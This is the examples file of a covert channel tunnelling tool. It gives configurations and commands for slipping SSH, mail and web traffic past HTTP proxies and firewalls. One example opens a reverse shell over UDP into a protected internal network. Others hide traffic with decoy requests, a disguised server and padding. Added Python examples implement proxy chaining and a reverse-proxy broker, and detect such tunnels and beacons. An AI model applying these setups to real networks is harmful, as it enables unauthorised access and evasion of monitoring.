CCTT - Covert Channel Tunneling Tool v0.1.8 - EXAMPLES
Copyright (C) 2002,2003 Simon Castro - scastro@entreelibre.com
$Id: EXAMPLES,v 1.15 2003/08/31 10:34:21 simsim Exp $

================================================================================
This file is part of CCTT - Covert  Channel  Tunneling  Tool  v0.1.8  (C)  Simon
Castro.
CCTT is free software; you can redistribute it and/or modify it under the  terms
of the GNU General Public License as published by the Free Software  Foundation;
either version 2 of the License, or (at your option) any later version.
CCTT is distributed in the  hope  that  it  will  be  useful,  but  WITHOUT  ANY
WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS  FOR A
PARTICULAR PURPOSE. See the GNU General Public License for more details.
You should have received a copy of the GNU General  Public  License  along  with
CCTT; if not, write to the Free Software  Foundation,  Inc.,  59  Temple  Place,
Suite 330, Boston, MA  02111-1307  USA
================================================================================

  Depending on how your local network (and its access control system) is
connected to the Internet and on the CCTT functionality you want, here are  a
few examples of client/server configuration files and of  the  command  line
parameters to use.

   I) Pass through an HTTP Proxy  network  scheme  to  access  several  external
      services
  II) Pass through a network scheme having UDP 'holes'. 
 III) Use HTTP Login/Password credentials on an external Website with CCTT
  IV) Use the CCTT client only to get the Proxy Chain functionality
   V) Reverse proxy mode concept demonstration with CCTT
  VI) HTTP Mode : Creating confusion by sending / receiving unnecessary  HTTP
      messages
 VII) HTTP Mode : Creating confusion by customizing how the server looks
VIII) HTTP Mode : Creating confusion by adding padding to channel data

================================================================================

I) Pass through an HTTP Proxy network scheme to access several external services

  A] Local network scheme

  A usual local network scheme has only one way out : the HTTP proxy. But  it
  often allows connections to remote Web servers on TCP  port  443  with  the
  CONNECT method, and that is what we use here.
  We assume that we know the proxy IP address : 192.168.1.1  and  its  listening
  port : 8080.

  B] CCTT functionalities

     We want, from the local network :
    * SSH access to our personal box connected to the Internet (111.222.1.1).
    * SMTP access to our personal ISP smtp server (111.222.2.1).
    * POP access to our personal ISP pop server (111.222.2.2).

  C] Configuration files

  Our personal box configuration must be :
       * SSH server listening on the loopback.
       * Firewall allows In/Out to our ISP SMTP and POP servers.
       * A restricted user (without shell, no rights) whose name is cctt.
       * A chroot directory used as a jail (cage in the configuration below).
       * And finally, we must have superuser access  to  execute  the  CCTT
         server part.
       
  The  server  configuration  file  (srv_example_1.cf)  must   look   like   the
  following :
       PROTOCOL=tcp
       IDENT=basic_ident
       IDENT_KEY=simsim
       SRV_SHELL_LOC=/usr/local/bin/false
       SRV_SHELL_CMD=false
       PROXY_MODE_LIST=ssh:127.0.0.1:22
       PROXY_MODE_LIST=smtp:111.222.2.1:25
       PROXY_MODE_LIST=pop:111.222.2.2:110
       PROXY_ONLY=ON
       PERM_USER_GROUP=cctt
       PERM_CHROOT=cage
  
  The client configuration files must look like the following :

    cl_example_1_ssh.cf :
        PROTOCOL=tcp
        CHANNEL_PROXY_IP=192.168.1.1
        CHANNEL_PROXY_PORT=8080
        CHANNEL_PROXY_PROT=tcp
        CHANNEL_PROXY_DEL=30000
        IDENT=basic_ident
        IDENT_KEY=simsim
        PROXY_MODE_LOCAL_IP=127.0.0.1
        PROXY_MODE_LOCAL_PORT=4222
        PROXY_MODE_PROT=tcp
        PROXY_MODE_REMOTE_IP=127.0.0.1
        PROXY_MODE_REMOTE_PORT=22

    cl_example_1_smtp.cf :
        PROTOCOL=tcp
        CHANNEL_PROXY_IP=192.168.1.1
        CHANNEL_PROXY_PORT=8080
        CHANNEL_PROXY_PROT=tcp
        CHANNEL_PROXY_DEL=30000
        IDENT=basic_ident
        IDENT_KEY=simsim
        PROXY_MODE_LOCAL_IP=127.0.0.1
        PROXY_MODE_LOCAL_PORT=4225
        PROXY_MODE_PROT=tcp
        PROXY_MODE_REMOTE_IP=111.222.2.1
        PROXY_MODE_REMOTE_PORT=25

    cl_example_1_pop.cf :
        PROTOCOL=tcp
        CHANNEL_PROXY_IP=192.168.1.1
        CHANNEL_PROXY_PORT=8080
        CHANNEL_PROXY_PROT=tcp
        CHANNEL_PROXY_DEL=30000
        IDENT=basic_ident
        IDENT_KEY=simsim
        PROXY_MODE_LOCAL_IP=127.0.0.1
        PROXY_MODE_LOCAL_PORT=42110
        PROXY_MODE_PROT=tcp
        PROXY_MODE_REMOTE_IP=111.222.2.2
        PROXY_MODE_REMOTE_PORT=110

  D] Command line parameters to run CCTT 

    To run the server part, we use (root account) : 
    cctt -s 111.222.1.1 -p 443 -f srv_example_1.cf -t socket_encode -L -v &

    To run the client parts, we use (no root account) : 
    cctt -c 111.222.1.1 -d 443 -f cl_example_1_ssh.cf \
      -t socket_http_proxy_encode -a &
    cctt -c 111.222.1.1 -d 443 -f cl_example_1_smtp.cf \
      -t socket_http_proxy_encode -a &
    cctt -c 111.222.1.1 -d 443 -f cl_example_1_pop.cf \
      -t socket_http_proxy_encode -a &

  We now have three TCP ports listening on the loopback of our  box  on  the
  internal network :
       * port 4222 reaches our personal Internet box using the SSH protocol.
       * port 4225 reaches our ISP's external SMTP server.
       * port 42110 reaches our ISP's external POP server.

  The CCTT server is running on our personal  Internet  box  with  restricted
  privileges, jailed in the 'cage' directory, and sends verbose  messages  to
  the local syslogd.
  Note that only the SSH session is protected end to end, by SSH itself.  The
  SMTP and POP sessions leave the CCTT server in clear on  their  way  to  the
  ISP : the server simply opens plain TCP connections to 111.222.2.1:25  and
  111.222.2.2:110 on their behalf.
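  Seen from the proxy side, the same scheme is what a proxy operator or analyst
  would want to check for. The following is an added example, not code from
  CCTT or from this file : a CONNECT to port 443 is expected to carry TLS, so
  the first bytes the client sends after the proxy's 200 answer should be a TLS
  ClientHello record, and a tunnel that starts with anything else deserves  a
  look. The session records and byte strings are constructed. That the encoded
  CCTT channel of this example does not start with a TLS handshake is an
  assumption drawn from the page calling it 'encoded' rather than TLS ; it is
  not verified here.

```python
import struct

# Constructed samples, not real captures: the first bytes a client sends into a
# CONNECT tunnel once the proxy has answered "HTTP/1.0 200 Connection established".
TLS_CLIENT_HELLO_PREFIX = (
    bytes.fromhex("16 03 01 00 c4")   # record: handshake(22), version 3.1, length 196
    + bytes.fromhex("01 00 00 c0")    # handshake: ClientHello(1), length 192
    + bytes.fromhex("03 03")          # client_version: TLS 1.2
    + bytes(32)                       # client_random (zeros here; constructed)
)
SSH_BANNER = b"SSH-2.0-OpenSSH_3.6p1\r\n"  # what an sshd on :443 (as in IV) sends back
ENCODED_BLOB = bytes.fromhex("4a 7f 13 9c 02 e1 5d 88 ab 10 0f c3")  # stand-in for an encoded channel


def looks_like_tls_client_hello(data: bytes) -> bool:
    """True if `data` starts with a TLS record that carries a ClientHello."""
    if len(data) < 9:
        return False
    content_type, major, minor, rec_len = struct.unpack("!BBBH", data[:5])
    if content_type != 0x16 or major != 3 or minor > 4:   # handshake record, SSL3..TLS1.3 versions
        return False
    hs_type = data[5]
    hs_len = int.from_bytes(data[6:9], "big")
    # A ClientHello's handshake header (4 bytes) plus body fills the record.
    return hs_type == 0x01 and hs_len + 4 == rec_len


def audit_connect_sessions(sessions):
    """`sessions`: records {client, dst, first_bytes}, one per CONNECT tunnel.
    Returns (client, dst, reason) for the tunnels worth a closer look."""
    findings = []
    for s in sessions:
        _host, _, port = s["dst"].rpartition(":")
        if port != "443":
            findings.append((s["client"], s["dst"], "CONNECT to a port other than 443"))
            continue
        if not looks_like_tls_client_hello(s["first_bytes"]):
            findings.append((s["client"], s["dst"], "no TLS ClientHello on a :443 tunnel"))
    return findings


# Constructed proxy-side records; the first_bytes would come from a capture or
# a proxy hook, since a plain access log only records the CONNECT line.
SAMPLE_SESSIONS = [
    {"client": "10.0.0.5", "dst": "111.222.9.9:443", "first_bytes": TLS_CLIENT_HELLO_PREFIX},
    {"client": "10.0.0.7", "dst": "111.222.1.1:443", "first_bytes": ENCODED_BLOB},
    {"client": "10.0.0.8", "dst": "111.222.1.1:443", "first_bytes": SSH_BANNER},
    {"client": "10.0.0.9", "dst": "111.111.1.1:8080",
     "first_bytes": b"CONNECT 222.222.2.2:8080 HTTP/1.0\r\n\r\n"},
]

if __name__ == "__main__":
    for finding in audit_connect_sessions(SAMPLE_SESSIONS):
        print(*finding)
```

  Only the real browser session (10.0.0.5) passes ; the encoded channel, the
  sshd-on-443 trick of example IV and the CONNECT to 8080 of the proxy  chain
  all stand out. The check says nothing about what the tunnel carries, only
  that it is not what port 443 implies.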

================================================================================

II) Pass through a network scheme having UDP 'holes'.

  A] Local network scheme

  The network we want to pass through sits behind a badly configured  network
  access control system : we know that, from a box on the  internal  network,
  it is possible to reach an Internet server listening on UDP port 7272.

  B] CCTT functionalities

  We want to open a UDP channel to the remote Internet server (111.222.1.1:7272)
  and bind a reverse shell to it, so that we get access to the internal network
  from the outside box.

  C] Configuration files

  Our personal box configuration must be :
       * Firewall allows In/Out UDP datagrams on the 7272 port.
       * A restricted user (without shell, no rights) whose name is cctt.
       * A chroot directory used as a jail (cage in the configuration below).
       * And finally, we must have superuser access  to  execute  the  CCTT
         server part.

  The  server  configuration  file  (srv_example_2.cf)  must   look   like   the
  following :
      PROTOCOL=udp
      IDENT=basic_ident
      IDENT_KEY=simsim
      SRV_SHELL_LOC=/usr/bin/false
      SRV_SHELL_CMD=false
      PERM_USER_GROUP=cctt
      PERM_CHROOT=cage

  The client configuration file (cl_example_2.cf) must look like the following :
      PROTOCOL=udp
      IDENT=basic_ident
      IDENT_KEY=simsim

  D] Command line parameters to run CCTT 

    To run the server part, we use (root account) : 
    cctt -s 111.222.1.1 -p 7272 -f srv_example_2.cf -t socket_encode -l &

    To run the client part, we use (no root account) : 
    cctt -c 111.222.1.1 -d 7272 -f cl_example_2.cf -t socket_encode -r &
           
  Using the server's interactive mode, we now have access, from our  Internet
  box, to the protected internal network.
  NB : The shell session is saved in a log file.

================================================================================

III) Use HTTP Login/Password credentials on an external Website with CCTT

  A] Local network scheme

  The network scheme in this example is similar to the one in  I),  but  any
  network scheme would do ; this example focuses on the desired functionality.
  We know the HTTP proxy's IP address (192.168.1.1) and its  listening  port
  (8080), and we know that the CONNECT method is allowed.

  B] CCTT functionalities

  We have to enter a login and a password on an Internet Web site from our box
  on the internal network.
  The problem : the remote Web server does not have SSL enabled, and we do not
  want the network administrators to see our credentials on the wire.

  C] Configuration files

  Our personal box configuration must be :
       * Firewall allows In/Out TCP access to the remote Web server.
       * A restricted user (without shell, no rights) whose name is cctt.
       * A chroot directory used as a jail (cage in the configuration below).
       * And finally, we must have superuser access  to  execute  the  CCTT
         server part.

  The server configuration file (srv_example_3.cf) must look like the following:
      PROTOCOL=tcp
      IDENT=basic_ident
      IDENT_KEY=simsim
      SRV_SHELL_LOC=/usr/local/bin/false
      SRV_SHELL_CMD=false
      PROXY_MODE_LIST=http:111.222.7.7:80
      PROXY_ONLY=ON
      PERM_USER_GROUP=cctt
      PERM_CHROOT=cage

  The client configuration file (cl_example_3.cf) must look like the following :
      PROTOCOL=tcp
      CHANNEL_PROXY_IP=192.168.1.1
      CHANNEL_PROXY_PORT=8080
      CHANNEL_PROXY_PROT=tcp
      CHANNEL_PROXY_DEL=30000
      IDENT=basic_ident
      IDENT_KEY=simsim
      PROXY_MODE_LOCAL_IP=127.0.0.1
      PROXY_MODE_LOCAL_PORT=4280
      PROXY_MODE_PROT=tcp
      PROXY_MODE_REMOTE_IP=111.222.7.7
      PROXY_MODE_REMOTE_PORT=80

  D] Command line parameters to run CCTT 

    To run the server part, we use (root account) : 
    cctt -s 111.222.1.1 -p 443 -f srv_example_3.cf -t socket_encode -L -v &

    To run the client part, we use (no root account) : 
    cctt -c 111.222.1.1 -d 443 -f cl_example_3.cf \
      -t socket_http_proxy_encode -a &

  We now configure our browser to use 127.0.0.1:4280 as its HTTP proxy ;  our
  HTTP requests to the remote Web server (including its vhosts  on  the  same
  IP address, since the Host header is kept) are then sent through the
  'encoded' CCTT channel, and the CCTT server delivers them to 111.222.7.7:80.
  Two caveats : the credentials are hidden from the local network only ; they
  still travel in clear between the CCTT server and the Web  server.  And  the
  channel is described here as 'encoded', not encrypted : unless you have
  checked what the encoding provides, treat it as obfuscation against  casual
  inspection rather than as a substitute for SSL.

================================================================================

IV) Use the CCTT client only to get the Proxy Chain functionality

  A] Local network scheme

  Another example on the network scheme of I), to stress the idea again.
  We know the IP address and the listening port of the HTTP proxy located  on
  the internal network (192.168.1.1:8080).
  We know the IP addresses of two Internet HTTP  proxies  allowing  the  HTTP
  CONNECT method (111.111.1.1:8080 and 222.222.2.2:8080).
  We know that these three proxies allow connections to remote TCP ports  443
  and 8080.

  B] CCTT functionalities

  We want SSH access to our personal Internet box (111.222.1.1:443).
  An sshd is already listening on that port, and we would rather not  install
  anything else on that box :)

  C] Configuration files

  The client configuration file (cl_example_4.cf) must look like the following :
      PROTOCOL=tcp
      CHANNEL_PROXY_IP=192.168.1.1
      CHANNEL_PROXY_PORT=8080
      CHANNEL_PROXY_PROT=tcp
      CHANNEL_PROXY_DEL=25000
      HTTP_PROXY_CHAIN=111.111.1.1:8080:25000;222.222.2.2:8080:25000
      PROXY_MODE_LOCAL_IP=127.0.0.1
      PROXY_MODE_LOCAL_PORT=4222
      PROXY_MODE_PROT=tcp
      ### These ones are not used, but without them, the client won't start.
      IDENT=basic_ident
      IDENT_KEY=simsim
      PROXY_MODE_REMOTE_IP=127.0.0.1
      PROXY_MODE_REMOTE_PORT=22

  D] Command line parameters to run CCTT 

    To run the CCTT client (no root account), we use :
    cctt -c 111.222.1.1 -d 443 -f cl_example_4.cf \
      -t client_only_with_http_proxy &

  We now have the CCTT client listening on localhost:4222.
  When this client accepts a TCP connection, it connects to the internal HTTP
  proxy, asks it with CONNECT for 111.111.1.1:8080, asks that  one  the  same
  way for 222.222.2.2:8080, and finally asks the last one for  our  sshd  on
  111.222.1.1:443.
  At this time, we have a TCP channel  between  the  local  and  the  remote
  applications.
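  What the client does at that point, as an added example that is not  CCTT's
  code : parse the HTTP_PROXY_CHAIN value of cl_example_4.cf and issue one
  CONNECT per hop over the same TCP stream, checking each proxy's status  line
  before going one hop further. FakeProxyStream is a constructed stand-in for
  the socket so that the exchange can be run offline ; treating the third field
  of each chain entry as a timeout in milliseconds, like CHANNEL_PROXY_DEL, is
  an assumption, since the page does not give the unit.

```python
import socket


def parse_proxy_chain(value: str):
    """Turn 'ip:port:delay;ip:port:delay' (the HTTP_PROXY_CHAIN syntax) into a
    list of (host, port, timeout_seconds). Reading the delay as milliseconds,
    like CHANNEL_PROXY_DEL, is an assumption: the page does not give the unit."""
    hops = []
    for entry in filter(None, value.split(";")):
        host, port, delay = entry.split(":")
        hops.append((host, int(port), int(delay) / 1000.0))
    return hops


def _read_response_head(stream, limit=8192) -> bytes:
    """Read an HTTP response head (up to the blank line) from the stream."""
    buf = b""
    while b"\r\n\r\n" not in buf:
        chunk = stream.recv(4096)
        if not chunk or len(buf) > limit:
            raise ConnectionError("proxy closed the tunnel or sent no HTTP head")
        buf += chunk
    return buf


def connect_through(stream, host: str, port: int, timeout: float) -> None:
    """Ask the proxy at the far end of `stream` to open a tunnel to host:port
    and fail unless it answers 200 (the status text varies between proxies)."""
    stream.settimeout(timeout)
    stream.sendall(f"CONNECT {host}:{port} HTTP/1.0\r\n\r\n".encode("ascii"))
    status = _read_response_head(stream).split(b"\r\n", 1)[0].split(b" ")
    if len(status) < 2 or status[1] != b"200":
        raise ConnectionError(f"CONNECT {host}:{port} refused: {status!r}")


def chain_connect(stream, hops, target_host, target_port):
    """`stream` is already connected to the first proxy (CHANNEL_PROXY_IP:PORT).
    Each CONNECT is answered by the proxy reached by the previous one, so after
    the last hop the same stream carries bytes end to end. Returns the tunnels
    opened, in order."""
    last_timeout = hops[-1][2] if hops else 30.0
    opened = []
    for host, port, timeout in hops + [(target_host, target_port, last_timeout)]:
        connect_through(stream, host, port, timeout)
        opened.append(f"{host}:{port}")
    return opened


def open_chain(first_proxy, chain_value, target_host, target_port):
    """Real-network entry point: connect to the internal proxy, tunnel through
    the chain, and return the socket to hand to the application (here ssh)."""
    sock = socket.create_connection(first_proxy)
    chain_connect(sock, parse_proxy_chain(chain_value), target_host, target_port)
    return sock


class FakeProxyStream:
    """Constructed stand-in for the socket: records each CONNECT and answers
    like a permissive proxy, or with 403 for targets listed in `deny`."""

    def __init__(self, deny=()):
        self.requests, self._out, self.deny = [], b"", set(deny)

    def settimeout(self, seconds):
        pass

    def sendall(self, data: bytes):
        request_line = data.split(b"\r\n", 1)[0].decode("ascii")
        self.requests.append(request_line)
        target = request_line.split(" ")[1]
        if target in self.deny:
            self._out += b"HTTP/1.0 403 Forbidden\r\n\r\n"
        else:
            self._out += b"HTTP/1.0 200 Connection established\r\n\r\n"

    def recv(self, n: int) -> bytes:
        chunk, self._out = self._out[:n], self._out[n:]
        return chunk


CHAIN = "111.111.1.1:8080:25000;222.222.2.2:8080:25000"   # from cl_example_4.cf


def demo():
    """Replay example IV offline; returns (tunnels opened, requests seen)."""
    fake = FakeProxyStream()
    opened = chain_connect(fake, parse_proxy_chain(CHAIN), "111.222.1.1", 443)
    return opened, fake.requests


if __name__ == "__main__":
    print(demo())
```

  Against a real network, open_chain(("192.168.1.1", 8080), CHAIN,
  "111.222.1.1", 443) returns the socket that an SSH client can then talk on.
  Each proxy in the chain only ever sees a CONNECT for the next hop, which is
  why the last proxy, not the first, has to allow port 443.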

================================================================================

V) Reverse proxy mode concept demonstration with CCTT.

  A] Local network scheme

  The network scheme in this example is similar to the one in  I),  but  any
  network scheme would do ; this example focuses on the desired functionality.
  We know the HTTP proxy's IP address : 192.168.1.1 and  its  listening  port  :
  8080. We also know that it is possible to use the CONNECT method.

  B] CCTT functionalities

  We want remote access, from the external network, to the internal Web server
  (192.168.2.1:80) and to the internal SMTP server (192.168.2.2:25).
  Two external stations (W1 and W2) will be allowed to connect  to  the  Web
  server and a third one (S) to the SMTP server, through  our  CCTT  server
  running on an external station (C, 111.222.1.1:443).

  C] Configuration files

  The  server  configuration  file  (srv_example_5.cf)  must   look   like   the
  following :
        PROTOCOL=tcp
        IDENT=basic_ident
        IDENT_KEY=simsim
        SRV_SHELL_LOC=/usr/local/bin/false
        SRV_SHELL_CMD=false
        PROXY_ONLY=ON
        PERM_USER_GROUP=cctt
        PERM_CHROOT=cage

  The internal located client  configuration  file  (cl_Wint_example_5.cf)  must
  look like the following to allow access to the Web server :
	PROTOCOL=tcp
	IDENT=basic_ident
	IDENT_KEY=simsim
	CHANNEL_PROXY_IP=192.168.1.1
	CHANNEL_PROXY_PORT=8080
	CHANNEL_PROXY_PROT=tcp
	CHANNEL_PROXY_DEL=15000
	PROXY_MODE_PROT=tcp
	PROXY_MODE_REMOTE_IP=192.168.2.1
	PROXY_MODE_REMOTE_PORT=80

  The internal located client  configuration  file  (cl_Sint_example_5.cf)  must
  look like the following to allow access to the SMTP server :
	PROTOCOL=tcp
	IDENT=basic_ident
	IDENT_KEY=simsim
	CHANNEL_PROXY_IP=192.168.1.1
	CHANNEL_PROXY_PORT=8080
	CHANNEL_PROXY_PROT=tcp
	CHANNEL_PROXY_DEL=15000
	PROXY_MODE_PROT=tcp
	PROXY_MODE_REMOTE_IP=192.168.2.2
	PROXY_MODE_REMOTE_PORT=25

  The external located client  configuration  file  (cl_Wext_example_5.cf)  must
  look like the following to allow access to the Web server :
	PROTOCOL=tcp
	IDENT=basic_ident
	IDENT_KEY=simsim
	PROXY_MODE_LOCAL_IP=@IP_W1
	PROXY_MODE_LOCAL_PORT=4280
	PROXY_MODE_PROT=tcp
	PROXY_MODE_REMOTE_IP=192.168.2.1
	PROXY_MODE_REMOTE_PORT=80

  The external located client  configuration  file  (cl_Sext_example_5.cf)  must
  look like the following to allow access to the SMTP server :
	PROTOCOL=tcp
	IDENT=basic_ident
	IDENT_KEY=simsim
	PROXY_MODE_LOCAL_IP=@IP_S
	PROXY_MODE_LOCAL_PORT=4225
	PROXY_MODE_PROT=tcp
	PROXY_MODE_REMOTE_IP=192.168.2.2
	PROXY_MODE_REMOTE_PORT=25

  D] Command line parameters to run CCTT 

     We first run the server (as root) using :
     cctt -s 111.222.1.1 -p 443 -f srv_example_5.cf -t socket -L -v &

     We then run the two internal located CCTT clients in reverse proxy mode :
     cctt -c 111.222.1.1 -d 443 -f cl_Wint_example_5.cf -t socket_http_proxy -z &
     cctt -c 111.222.1.1 -d 443 -f cl_Sint_example_5.cf -t socket_http_proxy -z &

  => These two internal CCTT clients register  themselves  with  the  CCTT
     server, which will use them as proxies to reach the Web and SMTP servers,
     and they keep their connections up.

  NB : The CCTT server dynamically adds and removes reverse proxy mode  CCTT
  clients as they establish or drop their connection.

     We then run the two external located CCTT clients in proxy mode :
     On W1, we run : cctt -c 111.222.1.1 -d 443 -f cl_Wext_example_5.cf \
       -t socket -a &
     On S, we run  : cctt -c 111.222.1.1 -d 443 -f cl_Sext_example_5.cf \
       -t socket -a &
     (W2 uses the same configuration and command line as W1,  with  its  own
     address in PROXY_MODE_LOCAL_IP.)

     => These two clients are now waiting for application connections.

  We now have two daemons listening : the one on @IP_W1:4280 gives access to
  the Web server, the one on @IP_S:4225 gives access to the SMTP server.

     When an application client wants a channel to the SMTP server :
       * It opens a connection to @IP_S:4225.
       * The CCTT client on S opens a connection to the CCTT server on C  and
         asks it for a channel to the SMTP server.
       * The CCTT server looks in its proxy list, finds the reverse connection
         from the internal CCTT client and proxies between the two connections.
       * The internal CCTT client receives the data, opens  a  connection  to
         the SMTP server and proxies between them.

  Other SMTP or Web application clients wanting  to  reach  the  internal
  resources go through the same steps.
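  The walk-through above, replayed as an added example that is neither  CCTT
  code nor part of this file : a minimal broker that keeps the 'proxy list' of
  registered reverse connections and splices an application  connection  onto
  the matching one. socketpair() stands in for the real TCP connections so  it
  runs offline. The rule that each reverse connection serves a single  channel
  and leaves the list when used is a simplification of this toy, not a
  description of how CCTT multiplexes its channels.

```python
import socket
import threading


class ReverseProxyBroker:
    """Toy model of the CCTT server's proxy list in reverse proxy mode: maps a
    target 'ip:port' to the connection an internal client keeps open for it."""

    def __init__(self):
        self._lock = threading.Lock()
        self._reverse = {}  # target -> socket held open by the internal client

    def register(self, target: str, sock) -> None:
        """An internal client (run with -z) announces it can reach `target`."""
        with self._lock:
            self._reverse[target] = sock

    def unregister(self, target: str) -> None:
        """The internal client dropped its connection: forget it."""
        with self._lock:
            self._reverse.pop(target, None)

    def targets(self):
        with self._lock:
            return sorted(self._reverse)

    def open_channel(self, target: str, app_sock) -> str:
        """An external client asks for a channel to `target`: look it up in the
        proxy list and splice both connections. In this toy each reverse
        connection serves one channel and leaves the list when used (a
        simplification of the model, not a statement about CCTT's multiplexing)."""
        with self._lock:
            rev = self._reverse.pop(target, None)
        if rev is None:
            raise LookupError(f"no reverse proxy registered for {target}")
        for src, dst in ((app_sock, rev), (rev, app_sock)):
            threading.Thread(target=_pump, args=(src, dst), daemon=True).start()
        return target


def _pump(src, dst) -> None:
    """Copy bytes src -> dst until src closes, then half-close dst."""
    try:
        while True:
            data = src.recv(4096)
            if not data:
                break
            dst.sendall(data)
    except OSError:
        pass
    finally:
        try:
            dst.shutdown(socket.SHUT_WR)
        except OSError:
            pass


def demo_smtp_channel():
    """Replay the SMTP walk-through offline, socketpair() standing in for the
    real TCP connections. Returns what each end received and the targets left."""
    broker = ReverseProxyBroker()
    # Internal client (cl_Sint_example_5.cf) keeps a connection up to the
    # server and registers 192.168.2.2:25.
    rev_internal, rev_server = socket.socketpair()
    broker.register("192.168.2.2:25", rev_server)
    # External client on S accepts an application connection on @IP_S:4225
    # and asks the server for a channel to 192.168.2.2:25.
    app_client, app_server = socket.socketpair()
    broker.open_channel("192.168.2.2:25", app_server)
    for s in (rev_internal, app_client):
        s.settimeout(5)
    app_client.sendall(b"EHLO s.example\r\n")   # constructed application data
    seen_by_internal = rev_internal.recv(4096)  # the internal client would now pass this to 192.168.2.2:25
    rev_internal.sendall(b"250 OK\r\n")         # ... and relay the SMTP server's answer back
    seen_by_app = app_client.recv(4096)
    app_client.close()
    rev_internal.close()
    return seen_by_internal, seen_by_app, broker.targets()


if __name__ == "__main__":
    print(demo_smtp_channel())
```

  The important property is the one the page's NB describes : the server never
  opens a connection toward the internal network itself. It only  ever  pairs
  two connections that were both opened toward it, which is why the  internal
  firewall and proxy see nothing but outbound CONNECTs.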

================================================================================

VI) HTTP Mode : Creating confusion by sending/receiving unnecessary HTTP messages.

   Configuration file examples are in doc/confs/http_post1.
   Refer to previous examples for the command line parameters.

  A] Local network scheme
    
  Any local network scheme allowing a local user to send HTTP POST  requests  to
  the outside world with or without using an intermediary HTTP proxy.

  B] Presented functionalities

  The CCTT HTTP mode allows sending unnecessary HTTP  POST  request  messages
  besides the ones the data channel needs.
  The CCTT client sends these POST messages to the CCTT server at regular or
  random intervals ; they carry no communication channel data.
  If these POST messages are declared in the server configuration, the  CCTT
  server answers with the content of the related files, and the CCTT  client
  discards that content.

  The resulting traffic may thus increase the confusion of an observer.

================================================================================

VII) HTTP Mode : Creating confusion by customizing how the server looks.

   Configuration file examples are in doc/confs/http_post1.
   Refer to previous examples for the command line parameters.

  A] Local network scheme
    
  Any local network scheme allowing a local  user  to  send  HTTP  POST  request
  message to the outside world with or without using an intermediary HTTP proxy.

  B] Presented functionalities

  If the CCTT server is configured as in example VI, it can accept  incoming
  request messages (HTTP or not) from non-CCTT clients.
  If such an HTTP request is declared in the server configuration  (GET
  /index.html HTTP/1.0 for example), the server sends back the file  content ;
  if it is not, the server sends back an error page.
  Examples of such pages are available in the HTML presentation  located  on
  the Gray-World website.

================================================================================

VIII) HTTP Mode : Creating confusion by adding padding to channel data.

   Configuration file examples are in doc/confs/http_post2.
   Refer to previous examples for the command line parameters.

  A] Local network scheme
    
  Any local network scheme allowing a  local  user  to  send  HTTP  POST request
  messages to the outside world with  or  without  using  an  intermediary  HTTP
  proxy.

  B] Presented functionalities

  The HTTP mode of CCTT allows adding padding before or after  the  channel
  data.
  This padding can be added to the HTTP POST request messages of the  client
  or to the HTTP response messages of the server.

  A capture of a padded HTTP exchange between a client and a server  can  be
  found in the doc/confs/http_post2/snort_capture.txt file.
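  To see what the tricks of VI and VIII look like from the observer's side,
  here is an added example (not part of CCTT or of this file) : a detector that
  scores the HTTP POST requests of one client on two heuristics,  fixed-period
  requests and byte-identical response bodies to every POST (what VI produces
  when the server answers each decoy POST with the same file). The sessions
  are constructed, the thresholds are arbitrary and the heuristics are the
  editor's, not anything the page describes.

```python
import hashlib
import statistics


def interval_cv(timestamps):
    """Coefficient of variation of the inter-request intervals: ~0 means a
    fixed period (a beacon), larger means irregular (human-like or randomized)."""
    gaps = [b - a for a, b in zip(timestamps, timestamps[1:])]
    if len(gaps) < 2 or statistics.mean(gaps) == 0:
        return float("inf")
    return statistics.pstdev(gaps) / statistics.mean(gaps)


def identical_response_fraction(bodies):
    """Share of POST responses whose body equals the most common one; a static
    file served to every POST gives 1.0, real application responses much less."""
    digests = [hashlib.sha256(b).hexdigest() for b in bodies]
    return max(digests.count(d) for d in set(digests)) / len(digests)


def score_session(session, cv_max=0.05, dup_min=0.8):
    """Score one client's POSTs; thresholds are arbitrary starting points."""
    timestamps = [p["t"] for p in session["posts"]]
    bodies = [p["resp"] for p in session["posts"]]
    cv = interval_cv(timestamps)
    dup = identical_response_fraction(bodies)
    reasons = []
    if cv <= cv_max:
        reasons.append("fixed-period POSTs")
    if dup >= dup_min:
        reasons.append("same response body to every POST")
    return {"client": session["client"], "cv": cv, "dup": dup, "reasons": reasons}


def scan(sessions):
    return [score_session(s) for s in sessions]


# Constructed data: (timestamp in seconds, response body) per POST.
PAGE = b"<html><body>It works!</body></html>"


def _session(client, timestamps, responses):
    return {"client": client,
            "posts": [{"t": t, "resp": r} for t, r in zip(timestamps, responses)]}


SAMPLE_SESSIONS = [
    # decoy POSTs every 30 s, server always answers with the same static file
    _session("10.0.0.7", [30 * i for i in range(12)], [PAGE] * 12),
    # decoy POSTs at random intervals (VI), same static file each time
    _session("10.0.0.8", [0, 17, 41, 66, 70, 103, 131, 160, 162, 199, 230, 244],
             [PAGE] * 12),
    # decoy POSTs every 30 s, each response padded differently (VIII)
    _session("10.0.0.9", [30 * i for i in range(12)],
             [PAGE + bytes([i]) * 5 for i in range(12)]),
    # ordinary browsing: bursts of requests, every response different
    _session("10.0.0.5", [0, 3, 4, 12, 45, 46, 47, 120, 121, 300],
             [b"page-%d" % i for i in range(10)]),
]

if __name__ == "__main__":
    for result in scan(SAMPLE_SESSIONS):
        print(result["client"], round(result["cv"], 2), round(result["dup"], 2), result["reasons"])
```

  The random-interval decoy (10.0.0.8) escapes the timing check, as VI intends,
  but not the duplicate-response check ; the padded decoy (10.0.0.9),  as  in
  VIII, escapes the duplicate-response check because every body differs, but
  not the timing check. A client that randomizes both, which is what combining
  VI and VIII gives, escapes both heuristics, so they are a starting point for
  hunting rather than a reliable signature.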

================================================================================
